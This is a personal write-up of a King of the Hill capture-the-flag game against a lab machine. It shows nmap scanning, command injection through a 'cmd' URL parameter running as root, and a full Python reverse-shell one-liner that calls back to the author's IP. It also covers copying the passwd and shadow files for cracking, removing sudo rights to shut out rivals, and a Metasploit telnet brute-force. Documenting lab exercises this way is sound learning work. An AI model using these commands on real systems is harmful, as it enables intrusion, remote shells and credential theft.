# Noah's Spacejam KOTH writeup

I started by running two nmap scans, one ‘fast’ scan with the `-f` flag for the top 1,000 ports, and another full scan with `-p-` for all ports.\
`sudo nmap -f -sC -sV -T5 -oN fastscan -v 10.10.182.201`\
`sudo nmap -p- -v -sC -sV -T5 -oN fullscan 10.10.182.201`

Abbreviated output of the fast scan:

```
Scanning 10.10.182.201 [1000 ports]
Discovered open port 80/tcp on 10.10.182.201
Discovered open port 23/tcp on 10.10.182.201
Discovered open port 22/tcp on 10.10.182.201
Discovered open port 3000/tcp on 10.10.182.201
Discovered open port 9999/tcp on 10.10.182.201
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
23/tcp   open  telnet  Linux telnetd
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|   Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Michael Jordan
3000/tcp open  http    Node.js (Express middleware)
| http-methods:
|   Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
9999/tcp open  http    Golang net/http server
```

Picking a port at random, I jumped to port 3000 in the browser, which gave a very useful hint: ‘cmd parameter missing’.\
Testing the cmd parameter on the assumption that it ran OS commands, I tried `http://10.10.182.201:3000/?cmd=whoami`, which returned `root`. This seemed too easy, but all evidence showed it really did run commands as root.\
Before creating my reverse shell I did a `http://10.10.182.201:3000/?cmd=echo unnoable > /root/king.txt` to get the king points started.\
Going over to pentestmonkey’s reverse shell cheat sheet, I started a `nc -lvnp 12345` listener on my end and ran the python shell after checking `which python`.\
`http://10.10.182.201:3000/?cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.2.5.16",12345));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'`\
I then upgraded my shell with python and stty:\
`python -c 'import pty; pty.spawn("/bin/bash")'`\
`[ctrl + z]`\
`stty raw -echo`\
`fg`\
To make it harder for others to follow me to root, I cleared out the sudo permissions, which were a straight shot to root since both users had full sudo access with no password. I tried adding a new user account, but something was messing it up, so I just left it and made sure not to lose my access.\
Doing some post-exploitation, I stole the passwd and shadow files to crack the passwords later. They are now in a crackable form after running john's unshadow tool: `sudo /usr/sbin/unshadow passwd shadow > unshadow.crack`.\
I looked around the machine but only found 2 flags: a duplicate user.txt for both bunny and Jordan, and a root.txt.\
Rob had also gotten root and did some fuckery with the king.txt so it was impossible to add your name to it. I tried searching the running processes with `ps -ef | grep king.txt` but couldn’t find the loop he said he was running. I also attempted brute-forcing the telnet login and tried an empty username/password.\
`msfconsole`\
`search telnet_login`\
`use 0`\
`options`\
`set RHOSTS 10.10.182.201`\
`set USERNAME spacejam`\
`set PASS_FILE /usr/share/wordlists/rockyou.txt`\
`run`\
But then it locked me out after like 3 tries :(\
There was also a pretty plain-looking website on port 80. Running `gobuster` on it originally showed a couple of directories, including /flag/. I tried running it again on that directory but didn’t get anything. I probably could have searched for php, html, or txt files with the `-x txt,html,php` gobuster flag, but there wasn’t a lot of time at this point.
